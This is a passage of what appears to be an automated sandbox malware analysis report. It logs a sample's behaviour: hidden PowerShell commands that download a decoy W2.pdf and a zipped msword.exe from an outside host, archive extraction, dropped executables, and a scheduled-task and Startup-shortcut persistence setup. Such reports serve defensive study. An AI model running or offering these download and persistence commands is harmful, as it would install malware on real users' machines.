    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    Suspicious powershell command line found
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 13_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,13_2_004062FC
    Source: msword.exe.11.drStatic PE information: real checksum: 0x14327c should be: 0x14956c
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C90DE6 push ecx; ret 38_2_00C90DF9

    Persistence and Installation Behavior

    barindex
    Drops PE files with a suspicious file extension
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comFile created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comJump to dropped file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comFile created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comJump to dropped file

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00D026DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,38_2_00D026DD
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00C8FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,38_2_00C8FC7C
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
